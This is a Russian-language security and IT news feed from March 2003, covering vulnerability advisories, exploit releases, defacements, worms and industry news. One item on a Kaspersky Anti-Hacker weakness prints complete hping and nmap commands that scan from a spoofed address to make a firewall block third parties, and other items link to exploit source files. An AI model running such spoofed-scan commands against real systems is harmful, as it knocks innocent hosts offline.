Немецкая компания Yellow Computing разработала долгожданный FTP-клиент YFTP для смартфонов Nokia 7650, Nokia 3650 и других устройств на платформе Series60. Выполненная в виде файл-менеджера, программа позволяет отсылать и получать файлы по протоколу FTP. Также имеется возможность создания, переименовывания и удаления файлов и папок, поддерживаются активный и пассивный режимы, анонимный логин, сохранение профилей, HSCSD и GPRS соединения. Приложение написано на C++ для Symbian OS, имеет англоязычный интерфейс, требует 150К памяти. Стоимость 25 долларов США. Источник - http://mobile-review.com/
23/03/2003 11:15 Выход VMware Workstation 4 RC.
Объявлено о выпуске VMware Workstation 4 Release Candidate. Из изменений - новый интерфейс (выглядит также, как в Windows-версиях, улучшенная поддежка современного аппаратного обеспечения, усовершенствованная работа с операционными системами, устранение обнаруженных багов. По словам испытавших - имеются баги с работой блочных устройств. Подробности - http://www.vmware.com/download/workstation_beta.html
23/03/2003 10:20 В Ираке запрещено разговаривать по телефону.
Почти по всему Ираку остановлено предоставление услуг телефонной связи. Согласно информации, предоставленной пресс-службой гражданской обороны Ирака, правительство было вынуждено пойти на эту меру в целях безопасности. “ЦРУ больше не должно прослушивать наши разговоры,” - заявил официальный представитель Мохаммед Сабри. Некоторые источники сообщают, что звонить можно теперь только через коммутатор. Правительство Ирака приказало запретить звонки в сетях спутниковой и мобильной связи. Запрет не распространяется на журналистов, которые могут использовать свои телефоны в пресс-центрах. Информация получена с mobile-review.com. Исчтоник - http://www.rosbaltnews.com/
22/03/2003 16:03 Решение от Intel поможет бороться с DoS-атаками.
Специалисты компании Intel заявили о принципиально новой разработке в области защиты данных, на которую уже получен патент WO 03/005666. Аппаратно-программное решение позволит эффективно бороться с DoS-атаками, направленными на отключение того или иного интернет-сервиса, сообщает New Scientist. DoS-атаками называют направленный шторм запросов, который оказывается слишком большим для ресурса. В силу того, что ресурс не может обработать каждый запрос корректно, через некоторое время после атаки он просто-напросто отключается. Инженеры Дэвид Патзолу (David Putzolu) и Тодд Андерсон (Todd Anderson) предлагают для решения проблем, связанных с DoS-атаками, «модифицированный» маршрутизатор, способный автоматически фильтровать запросы с атакующих интернет-адресов. Главным критерием для активации фильтра будет служить превышение порога по трафику. Кроме того, для передачи данных через такой маршрутизатор станет обязательной «цифровая сертификация» — без нее хакеры вряд ли смогут передать в атакуемую систему хотя бы один байт. Источник - http://www.webplanet.ru
22/03/2003 12:27 Новый документ от NGSSoftware.
Дэвид Литчфилд из NGSSoftware cообщает об опуликовании нового доумента, разработанного его фирмой. Посвящён он, как следует из анонса, описанию общей теории атак на Вэб-сервера под управлением ОС Win2K. Как известно на этой неделе была раскрыта уязвимость в IIS-сервере под управлением Win2K - в компоненте WebDAV. Microsoft выпущен соответствующий бюллетень MS03-007, в котором анонсировался патч, закрывающий эту уязвимость. Однако, как пишет Дэвид, атака на уязвимость в компоненте WebDAV - это лишь один из векторов возможного проведения атаки и всё выглядит намного серьёзнее - существует возможность проведения атаки на другие Java-ориентированные Вэб-сервера и другие компоненты IIS.. Подробности - http://www.ngssoftware.com/papers/ms03-007-ntdll.pdf
22/03/2003 11:38 Уязвимость в Check Point FW-1.
Dr. Peter Bieringer из AERAsec Network Services and Security GmbH (Германия) сообщает о наличии уязвимости в популярном файрволле Check Point FW-1 NG (версии с FP3). Уязвимость связана с некорректной обработкой демоном регистрации syslog эскейп-последовательность. Послав специально сформированную ESC-последовательность удалённый атакующий может повесить syslog. Рекомендуется обновить Check Point FW-1 до версии FP3 HF2. Подробности - http://www.aerasec.de/security/advisories/checkpoint-fw1-ng-fp3-syslog-crash.html
22/03/2003 10:32 Неустранённая уязвимость в Opera.
Как пишет nesumin из softhome, выпущена версия броузера Opera 6.06, однако уязвимость, связанная с переполнением буфера при слишком длинном имени пользователя по прежнему осталась в Опере. В подтверждение своих слов автор опубликовал пример эксплоита. Эксплоит - http://www.security.nnov.ru/files/unbof_demo.txt
22/03/2003 10:04 Патч для устранения уязвимости в ядрах Linux.
Вчера мы сообщали о письме Алана Кокса, в котором приводился также патч для ядра Linux версии 2.4, устраняющий уязвимость в ядре, связанную с ptrace(). Однако, как оказалось, патч Алана применим только к версии ядра 2.4.21-pre-ac. Ниже приведена ссылка на патч для ядра 2.4.20. Патч - http://www.hardrock.org/kernel/2.4.20/linux-2.4.20-ptrace.patch
22/03/2003 09:06 Хакеры взломали АНБ?
Как ссобщает securityfocus, некие хакеры сообщили, что ими был взломан сайт Агентства Национальной Безопасности (АНБ, он же NSA) США. Сайт физически был размещён в Ft. Meade, штат Мерилэнд. Однако, взломанный ими компьютер принадлежал подразделению по взаимодействиям с общественностью (public affairs office). И вместо конфиденциальных данных АНБ были получены лишь автобиографические данные некоторых сотрудников, а также частная переписка АНБ с масс-медиа, ака CNN и Forbes. Сообщение, в котором сообщалось о достигнутом успехе securityfocus, содержало только информацию об IP-адресе сервера, почтовом адресе офиса АНБ по связям с общественностью и сообщение "Please find attached some documents from Don and Trisha Weber, NSA". Подробности - http://www.securityfocus.com/news/3291
21/03/2003 22:26 Дефейс сайта Интерпола.
Как сообщил нам неизвестный посетитель нашего сайта через электронную почту, был дефейснут сайт Интерпола. Честно говоря, ребята - дефейсеры (если их несколько, конечно) могли бы и постараться с графикой. :) На настоящий момент (22:20) вместо содержимого сайта выводится только текстовая надпись "PEACE BROTHERS! WE HATE WAR! BUSH - motherfucker!" (прошу прощения за выражение на американском языке :) ). Обращение к посетителям сайта, пишущим нам свои новости - думаю, можно было бы и указать хотя бы свой никнейм, чтобы мы знали, кого поблагодарить за новость. ;) Адрес сайта - http://www.interpole.com/
21/03/2003 15:59 Cообщение Алана Кокса об уязвимости в ptrace().
На сайте www.spinics.net опубликовано письмо Алана Кокса, в котором он сообщает, что для ветки 2.2 выпущена обновлённая версия 2.2.25, в которой, собственно и устранена уязвимость. Баго фиксы, которые должны были появиться в пререлизе 2.2.25pre1 теперь появятся в 2.2.26pre1. Патч для Linux 2.4.20/Linux 2.4.21pre содержится в самом письме. Сообщение - http://www.spinics.net/lists/kernel/msg162986.html
21/03/2003 15:03 РБК бросает камень в огород Mail.Ru.
Почтовый сервис Hotbox.Ru, относящийся к числу интернет-сервисов группы компаний «РосБизнесКонсалтинг», 31 мая 2003 года отключит почтовые ящики тех пользователей, чья корреспонденция приходит на один из почтовых доменов сервиса — mailru.com. Такое решение принято администрацией проекта вследствие созвучия домена с доменом бесплатной почтовой службы Mail.Ru, «заслужившей имидж неустойчивой». История «Хотбокса» началась в конце ноября 2000-го года. Именно тогда интернет-холдинг «РосБизнесКонсалтинг» представил почтовый сервис Hotbox.Ru, основанный на наборе различных почтовых серверов, таких как pochtamt.ru, pisem.net, rbcmail.ru, fromru.com и других. Среди всего этого многообразия почтовых алиасов был и домен mailru.com, официальная кончина которого объявлена на 31 мая 2003 года. Об этом всем своим пользователям «Хотбокс» сообщил на заглавной странице почтовой службы, опубликовав 19 марта соответствующее уведомление. Странно то, что «РосБизнесКонсалтинг» сваливает свою «почтовую ошибку» на Mail.Ru, называя при этом самую крупную почтовую службу Рунета «заслужившей имидж неустойчивой». Источник - http://www.webplanet.ru
21/03/2003 14:40 Опубликованы секретные уязвимости.
Как сообщает ZDNetUK, некий хакер, называющий себя "Hack4Life", объявил в среду, что им были похищены с одного из корпоративных сайтов неопубликованные сообщения о трёх очень важных уязвимостях: об уязвимости в большинстве исходных кодов UNIX, об уязвимости в механизме аутентификации Kerberos и об уязвимости в некоторых механизмах шифрования содержимого Вэб-сайтов. Сам хакер заявил, что он похитил эту информацию с сайта компании (название которой не уточняется) в момент закрытого обсуждения этих уязвимостей с CERT. После похищения информация она была опубликована в общедоступном списке рассылки. Подробности - http://news.zdnet.co.uk/story/0,,t269-s2132225,00.html
21/03/2003 14:19 Уязвимости в Ximian Evolution.
Core Security Technologies сообщила об уязвимости в популярном в мире Linux и UNIX приложении Ximian Evolution. Это приложение по сути является аналогом Outlook Express в мире открытых систем - содержит почтовую программу, календарь, шедуллер, программу управления контактами и т.д. Обнаружены три уязвимости: повреждение памяти при разборе UUEncode, межсайтовый скриптинг, получение отпечатков клиента. Все эти уязвимости могут эксплуатироваться удалённо и привести к следующим последствиям: невозможности получить доступ к почте, вызвать нестабильность системы, возможность обхода системы безопасности при проверке содержимого почты, выполнение произвольного кода на уязвимой системе. Уязвимости присутствуют в версиях Evolution до 1.2.2 включительно. Ximian 18 марта выпущена обновлённая версия Evolution 1.2.3, доступная как с сайта компании, так и репозитария CVS. В качестве временной меры (до обновления) рекомендуется выполнить следующие действия: "View"->"Message Display" и включить опцию "Show E-mail Source". В описании приведены подробнейшие варианты эксплоитов. Подробности - http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
21/03/2003 13:12 RIAA угрожает компаниям судебной расправой.
Похоже, в своих намерениях остановить Интернет-пиратство музыкальной продукции RIAA решила не перед чем не останавливаться. В начале недели RIAA разослала руководителям 300 компаний предупреждение, где руководителям рекомендуется остановить пиратство среди своих сотрудников. В случае неповиновения, компаниям грозит судебное разбирательство, крупные штрафы и другие материальные издержки. Корреспонденту Associated Press в RIAA отказались назвать имена компаний, в которые Ассоциация разослали рекомендации по борьбе с пиратством. Однако в компании заявили, что в списке компаний есть и те, которые получают предупреждение не в первый раз. Напомним, что подобную инициативу RIAA начала осуществлять с ноября прошлого года, а в февраля около 1000 компаний получили от RIAA 47-страничный документ, где содержались рекомендации по борьбе в пиратством в корпоративных сетях и последствия нарушений авторских прав. Как сообщил представитель RIAA в списке компаний 35% составляют технологические компании, 20% - это компании, чья деятельность связана с здравоохранением и еще 20% различные фабрики и заводы, промышленные предприятия. Остальные компании – это представители различных сфер бизнеса. «Просветительская акция» RIAA вызвала протест у Ассоциации разработчиков информационных технологий Америки (ITAA), куда входят 400 технологических компаний и такие гиганты ИТ – индустрии как компании Microsoft и IBM. Источник - http://www.internet.ru
21/03/2003 12:59 Вышел Code Forge v3.0.
Вышла третья версия отличной коммерческой IDE для разработки приложений на самых разных языках программирования. В новой версии добавлен интегрированный отладчик и сильно изменен пользовательский интерфейс. Подробности - http://www.codeforge.com/
21/03/2003 11:40 Эксплоит для Locator service в Microsoft Windows NT4/2000/XP.
Опубликован эксплоит уязвимости в Microsoft Locator service (относится к RPC-сервисам), опубликованной в январе этого года. При использовании уязвимости возможно либо аварийного завершение сервиса, либо выполнение произвольного кода на уязвимой системе. Эксплоит написан obscou на Си для платформы Windows. Эксплоит - http://www.security.nnov.ru/files/winlocatorex.c
21/03/2003 11:09 Уязвимость в Mutt.
Core Security Technologies обнаружена уязвимость в коде IMAP-клиента довольно популярного почтового агента (MUA) Mutt. Уязвимость может привести к переполнению буфера и возможности выполнения произвольного кода в системе. Может быть вызвана с удалённого IMAP-сервера при помощи специально сформированного заголовка. Cвязана с некорректным преобразованием имени почтового ящика, который был задан в UTF-7 в кодировку UTF-8 (в функции utf8_to_utf7() модуля imap/utf7.c). Как сообщил Thomas Roessler, код Mutt был исправлен Эдмундом Гримли Эвансом - врезультате были выпущены 2 новых версии Mutt - 1.4.1 и 1.5.4. Первая входит в состав стабильной ветви программы, вторая относится к нестабильной. Всем пользователям рекомендуют обновиться. Описание уязвимости - http://www.coresecurity.com/common/showdoc.php?idx=310&idxseccion=10 Обновления - ftp://ftp.mutt.org/mutt/
21/03/2003 10:55 Хакеры-исламисты взломали почти 400 сайтов.
За сутки с момента начала войны в Ираке происламски настроенные хакеры атаковали почти 400 сайтов, оставив в качестве следа антивоенные лозунги на арабском и английском языке. По мнению представителей компаний, занимающихся проблемами безопасности в Сети, массированные атаки хакеров будут продолжаться непрерывно на протяжении нескольких дней с момента начала военных действий в Персидском заливе, сообщает газета WashingtonPost. Текст, оставленный хакерами на одном из взломанных сайтов говорит, что дефейсы - это только начало "новой эры кибервойн, которую мы обещали! Как США делают с миром то, что они хотят, так и мы будем делать с интернетом то, что захотим. Остановите американских террористов, и тогда мы остановимся. Да здравствует Ирак!" Такие атаки хакеров характеризуются термином "хактивизм" (hacktivism), который сопровождает все международные конфликты, говорит Джим Мелник (Jim Melnick), директор компании iDefense, специализирующейся на проблемах безопасности в Сети. По его словам, наибольшую угрозу представляют хакеры из группы Unix Security Guards, члены которой проживают в Египте, Марокко, Кувейте и Индонезии. Источник - http://www.webplanet.ru
21/03/2003 09:45 Уязвимость в Microsoft ISA-сервере.
19 марта фирма Micosoft выпустила бюллетень по безопасности MS03-009, в котором описана уязвимость в Microsoft Internet Security and Acceleration (ISA) Server 2000. ISA-сервер обладает возможностью применять фильтры приложений для фильтрации входного траффика, которые поддерживают ISA-сервер анализировать поток данных, поступающих для определённого приложения сервера. Эти фильтры приложений позволяют анализировать и оценивать входной поток для принятия решения о дальнейшем перенаправлении или блокировании этих данных. Подобный механизм применяется для защиты от "злонамеренных" URL, содержимое которых может быть использовано для атак на внутренние DNS-сервера защищаемой сети. Из-за ошибки в коде приложения, определяющего попытку взлома DNS, cуществует возможность некорректного переключения специфического DNS-запроса. Атакующий может cформировать специальный запрос к ISA-серверу и вызвать отказ в обслуживании (DoS) DNS-сервера. Уязвимость не затрагивает функциональность других ISA-приложений. Опасность уязвимости оченена Microsoft, как "Moderate". Выпущен соответствующий патч. Подробности - http://www.microsoft.com/security/security_bulletins/ms03-009.asp
21/03/2003 09:18 Бюллетень CERT, посвящённый уязвимости в XDR.
Вчера мы сообщали об уязвимости в библиотеке XDR, применяемой в механизме RPC. 19 марта CERT выпущен бюллетень по безопасности CA-2003-10, в котором описывается эта уязвимость, а также приводятся ссылки на обновлённые библиотеки от производителей. Подробности - http://www.cert.org/advisories/CA-2003-10.html
20/03/2003 16:19 Уязвимость в Windows Script Engine.
О существовании очередной серьёзной уязвимости в ОС Windows сообщает iDEFENSE. На сей раз уязвимость обнаружена в движке обработки скриптов ОC Windows. Языки скриптов (Visual Basic Script, JScript или JavaScript) используются для добавления дополнительных возможностей Вэб-серверам. Было установлено, что при передаче специальным образом сформированного JavaScript-кода через Internet Explorer (IE), Outlook или Outlook Express удалённый атакующий может вызвать переполнение кучи (heap) при обработке скрипта Windows Script Engine и, посредством этого, выполниьт произвольный код на системе жертвы. В данном случае уязвимость присутствует в динамической библиотеке обработки JavaScript-кода jscript.dll (расположен в %SystemRoot%\system32). iDEFENCE опубликован пример кода, который может использовать уязвимость. "Баг" обнаружен в ОС: Win98, 98SE, ME, NT4.0, 2K, XP в версиях Jscript.dll 5.1.0.4615, 5.5.0.6330, 5.6.0.6626. Microsoft выпущен соответствующий бюллетень MS03-008, обновляющий jscript.dll до 5.6.0.8513. Рекомендуется до обновления временно отключить в IE Active Scripting. Кроме того, пользователи Outlook 98, 2000 должны установить обновление с сервера Microsoft. Подробности - http://www.idefense.com/advisory/03.19.03.txt Бюллетень Microsoft - http://www.microsoft.com/technet/security/bulletin/MS03-008.asp
20/03/2003 15:14 Обновление JVM в IRIX.
SGI сообщает об обновлении виртуальной машины Java, включённой в дистрибутивы ОС IRIX. В версии Java2 v1.4.1 API, выпущенной SGI устранён целый букет уязвимостей, в различное время опубликованные Sun и CERT (в бюллетене указываются ссылки на 5 подобных уязвимостей). Всем администраторам рекомендуют обновить Java API. Подробности - http://www.sgi.com/support/security/
20/03/2003 14:53 Уязвимости в OpenSSL.
Уязвимость в реализации OpenSSL, связанная с операциями SSL и TLS обнаружена также в OpenBSD. Выпущены соотвествующие патчи для OpenBSD 3.1 и 3.2 под названием blinding patch. Также исследователями компьютерной безопасности обнаружен вариант атаки для получения значений RSA-ключей под названием "Bleichenbacher attack" (описан чешскими криптографами Vlastimil Klima, Ondrej Pokorny, и Tomas Rosa - отсюда и второе название атаки "Klima-Pokorny-Rosa attack" - прим. ньюсмейкера) в PKCS #1 v1.5 padding'е. Атака опасна для TLS 1.0 (aka SSL 3.0), однако не затрагивает OpenSSH. Чтобы провести атаку, необходимо открыть миллион TLS-соединений на машине. Пользователям (администраторам), работающим с любыми сервисами, использующими TLS и RSA-шифрование, рекомендуется обновить их версию OpenSSL. Сообщение составлено на основе комментария, посланного по E-mail SHuRuP (http://www.nixp.ru). Патчи и описание - http://www.openssl.org/news/secadv_20030319.txt Описание криптографической атаки - http://eprint.iacr.org/2003/052/
20/03/2003 13:59 Уязвимость в Kaspersky Anti-Hacker.
Господин с труднопроизносимым сочетанием имени и фамилии Bojan Zdrnja (судя по всему, из Хорватии) сообщает о возможности довольно простого выполнения атаки типа DoS против персонального файрволла, производимого "Лабораторией Касперского" Kaspersky Anti-Hacker v1.0. В состав этого файрволла включена небольшая IDS, способная на настоящий момент определить 7 видов атак, в том числе и различные фиды сканирования и TCP/UDP-флудинг. При определении подобного вида атак производится активное блокирование IP-адреса источника атаки. Автор предлагает для выполнения DoS-атаки применить сканирование от имени подменённого IP. В частности, утилита hping2 позволяет это сделать так: # hping -S -i u1 -s +1025 -p +21 <victims_IP_address> -w 3072 -a <spoofed_IP_address>. При этом персональный файрволл определит, что это SYN-флуд атака и блокирует подменённый IP (от себя добавлю, что в качестве его можно использовать, например, широкораспространённые Вэб-сервера, сервер провайдера). Подобную же атаку можно сымитировать при помощи NMAP: # nmap -sS -P0 -D<spoofed_IP_address> <victims_IP_address>. Как пишет сам автор, он связывался с производителем, однако ответа не получил. Честно говоря, от себя хотелось бы добавить, что подобным же образом можно заблокировать многие файрволлы (и не только персональные), поскольку подмена IP-адреса в подобных ситуациях является довольно большой проблемой. Источник - http://www.securityfocus.com
20/03/2003 13:24 Уязвимость в XDR RPC.
eEye Digital Security сообщает об обнаружении очень серьёзной уязвимости в библиотеках XDR, применяемых для обеспечения функционирования программного интерфеса высокого уровня RPC (Remote Procedure Call - удалённый вызов процедур). Был разработан и в дальнейшем внедрён во всех реализациях сетевых операционных систем для обеспечения возможности выполнения на сервере процедур, запрашиваемых клиентом. В частности, механизм процедур используется в NFS - сетевой фаловой системе. XDR - стандарт, использующийся для описания и кодирования данных, которые используются в процессе RPC-сеанса. Библиотека XDR (eXternal Data Representation) содержит функции для преобразования различных типов данных в машинно-независимый вид, позволяющий производить обмен информацией между разнородными системами. Из истории, рассказанной eEye вытекает следующее. В процессе работы над собственным сканером уязвимостей Retina ими были разработаны 2 программных приложения под названиями ADAM и EVE, при помощи которых осуществлялся аудит локальных и удалённых приложений на предмет наличия потенциальных уязвимостей. При анализе механизма работы RPC была обнаружена возможность как локального, так и удалённого переполнения данных в полях длины запросов при проведении RPC-транзакций. В частности, подобная возможность переполнения была обнаружена в функции xdrmem_getbytes() XDR-библиотеки в реализации Sun. Утверждается, что уязвимость существует в следующих библиотеках, в которых используется поддержка XDR - библиотека сетевых сервисов Sun Microsystems libnsl, BSD-билиотека libc, GNU-версия сетевой библиотеки с поддержкой RPC - glibc. CERT был предупреждён ещё в ноябре прошлого года и выпустил бюллетень CA-2003-10. Red Hat выпущена обновлённая версия библиотеки glibc для всех версий дистрибутивов. Так как MIT Kerberos 5 использует также механизм RPC выпущен патч и для него, о чём сообщил один из рабработчиков из Массачусетского тенлогического университета (MIT) Том Ю. Подробности - http://www.eeye.com/html/Research/Advisories/AD20030318.html Патч для Kerberos - http://web.mit.edu/kerberos/www/advisories/2003-003-xdr_patch.txt
20/03/2003 11:18 Подробности уязвимости в ptrace.
Ранее мы сообщали об уязвимости в ptrace (ядра Linux - 2.2 и 2.4), которая позволяет получить локальный доступ суперпользователя. Господин Andrzej Szombierski из Кракова (Польша) посчитал своим долгом раскрыть подробности этой уязвимости. Для её использования необходимо наличие следующих условий: ядро собрано с поддержкой загружаемых модулей, доступен загрузчик модулей и на него стоит ссылка в /proc/sys/kernel/modprobe, не заблокирован вызов ptrace () на уровне ядра. В большинстве дистрибутивов Linux все эти условия существуют по умолчанию. Работает уязвимость следующим образом. Когда какой-то процесс запрашивает другой процесс, который может быть загружен только как модуль, ядро порождает процесс-потомок (child process) с привилегиями EUID и EGID равными 0 (т.е. root) и вызывает через системный вызов execve - "/sbin/modprobe" (загрузчик модулей, указанный в /proc/sys/kernel/modprobe). Проблема в этом механизме заключается в том, что до того, как изменится EUID, любой пользовательский процесс-потомок может быть присоединён к вызову ptrace(). Таким образом, пользователь-злоумышленник может выполнить любой присоединённый процесс с полномочиями суперпользователя. В качестве мер противодействия предлагается: патчить ядро при помощи заплатки, выпущенной Аланом Коксом; отключить поддержку модулей (что, надо заметить, может сказаться на ядрах, в которых нельзя работать без модулей); инсталлировать модуль, блокирующий вызов ptrace(); указать в /proc/sys/kernel/modprobe путь на неправильный загрузчик. Выпущен эксплоит для версий ядра ix86, ccылка на который приведена ниже. Эксплоит - http://august.v-lo.krakow.pl/~anszom/km3.c
20/03/2003 10:08 "Кибертерроризм" замучил всех.
Об этом, как сообщили РИА "Новости" в пресс-службе Совета безопасности России, заявил заместитель секретаря СБ РФ Валентин Соболев после заседания Российско-американского комитета ученых по борьбе с высокотехнологичным терроризмом, которое прошло в среду в президиуме Российской Академии Наук. По мнению Соболева, "с развитием процессов глобализации и урбанизации, качественными изменениями общественной инфраструктуры высокотехнологичный терроризм становится реальным фактором, способным повлиять на судьбы цивилизованного развития". Заместитель секретарь СБ РФ подчеркнул, что Россия последовательно отстаивает линию на создание "глобальной системы противодействия новым вызовам и угрозам". В этой связи он обозначил в своем выступлении перед учеными двух стран круг проблем, связанных с противодействием "кибертерроризму", и выразил уверенность в том, что "объединение научного сообщества в интересах национальной безопасности как своих стран, так и всего человечества, - знак нового времени, новых политических реалий". Источник - http://www.internet.ru
20/03/2003 09:34 Червь "Ganda" противодействует антивирусным программам.
Как сообщает "Лаборатория Касперского", обнаружен новый вирус-червь "Ganda" . Он распространяется через интернет в виде файлов, прикрепленных к зараженным письмам. Также "Ganda" внедряет свою компоненту внутрь исполняемых Win32 PE EXE-файлов. Червь активно противодействует антивирусным программам. Червь является приложением Windows (PE EXE-файл), имеет размер 45056 байт написан на языке Assembler. Заголовок и текст выбираются из списка 10 вариантов на шведском языке и 10 вариантов на английском языке в зависимости от текущего установленного языка. Имя вложения: xx.scr (где xx - любые два символа в диапазоне от "a" до "z"). "Ganda" активизируется только если пользователь сам запускает зараженные файл (при двойном щелчке на вложении). Затем червь инсталлирует себя в систему и запускает процедуры своего распространения. При рассылке зараженных писем червь использует прямое подключение к SMTP-серверу."Ganda" считывает адреса из адресной базы WAB. Программа также ищет файлы "*.eml", "*.*htm*", "*.dbx", сканирует их и выделяет строки, являющиеся электронными адресами. Вредоносная программа сканирует все .EXE и .SCR файлы на локальном диске. Если в файле есть подходящие коммнады (проверяются из списка), то червь внедряет в последнюю секцию PE-файлов свою компоненту. Команда передачи управления на компоненту червя встраивается в выполняемый код. Встроенная компонента выполняет запуск копии червя из Windows каталога. Источник - http://www.viruslist.com
20/03/2003 09:05 Представитель компании Siemens об уязвимости в сотовых телефонах.
Об уязвимости в некоторых моделях сотовых телефонов фирмы Siemens, обнаруженной dwcgr0up, при послыке некоторых видов SMS-сообщений мы сообщали ранее. Во вторник также выступил представитель компании Джекоб Райс (Jacob Rice), который подтвердил наличие уязвимости в моделях серии Siemens 35 (наблюдается полное прекращение работы аппарата) и серии Siemens 45 (их можно привести в чувство за несколько минут определенными манипуляциями). Райс опровергает появившиеся в популярном списке почтовой рассылки Bugtraq сообщения о том, что аппараты стали жертвой атаки на отказ обслуживания (denial of service). "Это просто невозможно", - заверил он. Атаки DoS на сотовые телефоны случаются очень редко. За последние два года известен лишь один случай, когда вирус e-mail, выпущенный в японской сети NTT DoCoMo, заставил телефоны ее абонентов звонить в службу экстренной медицинской помощи этой страны. Зато гораздо чаще обнаруживаются проблемы программного обеспечения сотовых телефонов. Самые громкие скандалы из-за таких проблем также происходили в DoCoMo, которая была вынуждена отозвать тысячи сотовых телефонов за последние пять лет. Какой бы ни была причина отказа телефонов Siemens, это плохая новость для индустрии сотовых телефонов, которая на этой неделе проводит свою выставку CTIA Wireless 2003 в Новом Орлеане. Тем временем американские операторы беспроводных сетей развернули необычайно бурную деятельность по продвижению на рынок служб передачи данных и более навороченных аппаратов. Подробности - http://news.com.com/2100-1039-993197.html?tag=fd_top
19/03/2003 12:33 Троянец "Greetyah" в письмах, маскирующихся под открытки от Yahoo.
17 марта 2003 года была произведена массовая рассылка писем со ссылкой на троянскую программу "Greetyah". Троянец загружает из интернета файл и устанавливает его в ключе авто-запуска системного реестра. Пример рассылаемого письма: Date: Mon, 17 Mar 2003 14:57:57 From: replymsg@g1.gc.vip.sc5.yahoo.com To: Ivan Petrov Subject: Elena_M sent you a Yahoo! Greeting Yahoo! Greetings Surprise! You've just received a Yahoo! Greeting from from "Elena_M" (elena_m@mail.ru)! To view this greeting card, click on the following Web address at anytime within the next 30 days.... Программа написана на языке ассемблера. Размер файла 3072 байт. После старта программа выводит диалоговое окно с предложением отладки. Затем программа загружает исполняемый файл: sysman32.exe с сайта http://view-greetings-yahoo.com. Файл sysman32.exe содержит код другой троянской программы: Trojan.WebMoney.WMPatch.b Подробности - http://www.viruslist.com/index.html?tnews=1001&id=1974983
19/03/2003 11:50 Гиганты IT объединились против спама.
Представители ведущих технологических компаний AOL Time Warner, Dell, DoubleClick, Microsoft, Oracle, Sun Microsystems и Yahoo! при участии CNET Networks во второй раз в течении этого года собрались на форуме JamSpam, чтобы обсудить проблему незапрашиваемых электронных сообщений, которая, за последнее время, приобрела катастрофические масштабы, принося компаниям серьезные материальные убытки. По словам участников, спам – головная боль всех корпоративных сетей, Интернет-провайдеров и поставщиков Интернет-услуг. Ущерб от спама исчисляется миллионами долларов и это не только затраты на анти-спамовое ПО и фильтры, но и ущерб от непродуктивного использования рабочего времени, когда сотрудник компании тратят несколько часов для проверки своего почтового ящика. Кроме того, как отметили участники форума, фильтры против спама иногда задерживают важную корреспонденцию, тем самым нанося ущерб бизнесу компаний. По словам Стефании Фоссан, старшего менеджера по продуктам компании EarthLink, за последние 18 месяцев распространение спама приняло эпидемический характер и выросло на 500%. Главная цель форума – совместное обсуждение технологических решений проблемы и создание универсального и единого решения для борьбы со спамом, объединив все усилия и разработки Источник - http://www.internet.ru
19/03/2003 11:07 Утилита проверки IIS 5.0 на уязвимость в Webdav-компоненте.
В дополнение к анализатору, компания Positive Technologies (как сообщает securitylab.ru), разработчик сканера xspider, выпустила бесплатную утилиту, которая может использоваться для проверки вашего IIS сервера на уязвимость. Скачать - http://www.securitylab.ru/tools/_services/download/?ID=36594
19/03/2003 10:52 Ивановская милиция поймала 13 хакеров.
В Иваново сотрудниками отдела "К" УВД Ивановской области задержаны сразу 13 хакеров, которые долгое время пользовались чужими интернет-паролями. Как выяснилось, все задержанные — молодые люди в возрасте от 14 до 21 года. С помощь интернета они проникали на компьютеры ивановских пользователей и крали у них логины и пароли. Всего компьютерщики бесплатно использовали около 500 часов оплаченного другими пользователями интернета времени. Сейчас в отношении хакеров возбуждено уголовное дело по статье 272-й УК Российской Федерации — «Неправомерный доступ к компьютерной информации». По словам сотрудников милиции, личные компьютеры и модемы хакеров изъяты, однако если они будут признаны орудием преступления, то по решению суда все «железо» будет конфисковано. Преступления, совершенные молодыми ивановцами, которые на поверку оказались школьникаи и студентами престижных вузов Иваново, не относятся к категории тяжких. Вероятнее всего, злоумышленники отделаются условным наказанием или штрафами. Кого-то — по причине несовершеннолетия — и вовсе освободят от уголовной ответственности Источник - http://www.webplanet.ru
19/03/2003 10:43 Анализатор доступности WebDAV.
SensePost Research опубликован исходник скрипта на Перле, при помощи которого можно определить, активирована ли служба WebDAV на проверяемом IIS-сервере. Скрипт - http://packetstorm.linuxsecurity.com/UNIX/scanners/finder.pl
19/03/2003 10:25 Обновление Unix FAQ'а.
Как сообщает SHuRuP (http://www.nixp.ru/shurup/), на его сайте обновился раздел FAQ (часто задаваемые вопросы) по UNIX. В очередной раз обновлена статья Master'а с ответами на часто задаваемые вопросы по Unix'у - "Unix FAQ". Помимо небольших исправлений и дополнений, добавлен вопрос "Как примонтировать iso-образ в FreeBSD 5.x ?". FAQ - http://www.nixp.ru/cgi-bin/go.pl?q=articles;c=win;a=faq
19/03/2003 10:14 Британским военным урезали свободу слова.
Британским солдатам, находящимся на Ближнем Востоке в зоне предполагаемого конфликта с Ираком, запрещено пользоваться мобильными телефонами и интернетом, сообщила на днях газета The Daily Mail. Подобные меры приняты в связи с тем, что телефоны и почта используются военнослужащими для того, чтобы жаловаться родственникам на тяготы службы в горячей точке. Командование британской группировки считает, что из-за подобных переговоров в прессу просочилась информация о том, что военнослужащим не хватает питания и даже туалетных принадлежностей. Это дискредитирует британских военнослужащих перед их американскими союзниками, которые могут потерять уверенность в полной готовности союзников к ведению военных действий. Теперь солдаты могут общаться с родственниками только по контролируемым телефонам по 20 минут в неделю. Источник - http://www.dailymail.co.uk/
19/03/2003 10:01 Первый украинский учебник для кибер-полицейских.
При поддержке Центра исследования проблем компьютерной преступности и Центра по изучению транснациональной организованной преступности и коррупции (TraCCC) при Американском Университете (Вашингтон, США) группой авторов в составе: Голубева В.А., Гавловского В.Д., Цимбалюка В.С., под общей редакцией доктора юридических наук, профессора Калюжного Р.А. издано учебное пособие «Проблемы борьбы с преступлениями в сфере использования компьютерных технологий». Новость получена от Vladimir (sta(at)mail.zp.ua). Полный текст - http://www.crime-research.org/news/2003/03/1802.html
19/03/2003 09:48 ЦРУ не удастся прослушивать Ирак.
Практически на всей территории Ирака во вторник днем была отключена телефонная связь, осуществлявшаяся местной телекоммуникационной компанией. Как сообщили корреспонденту "Росбалта" в оперативном пресс-штабе гражданской обороны Ирака, это является вынужденной мерой, на которую власти пошли в целях обеспечения безопасности. "Теперь наши разговоры не будет подслушивать ЦРУ", — заявил представитель пресс-штаба Мохаммед Сабри. По некоторым данным, телефонные разговоры теперь возможны лишь при помощи коммутатора. Напомним, что согласно распоряжению правительства Ирака, разговаривать по спутниковым и мобильным телефонам в стране разрешено лишь иностранным журналистам, но исключительно в пресс-центрах. Источник - http://www.cnews.ru
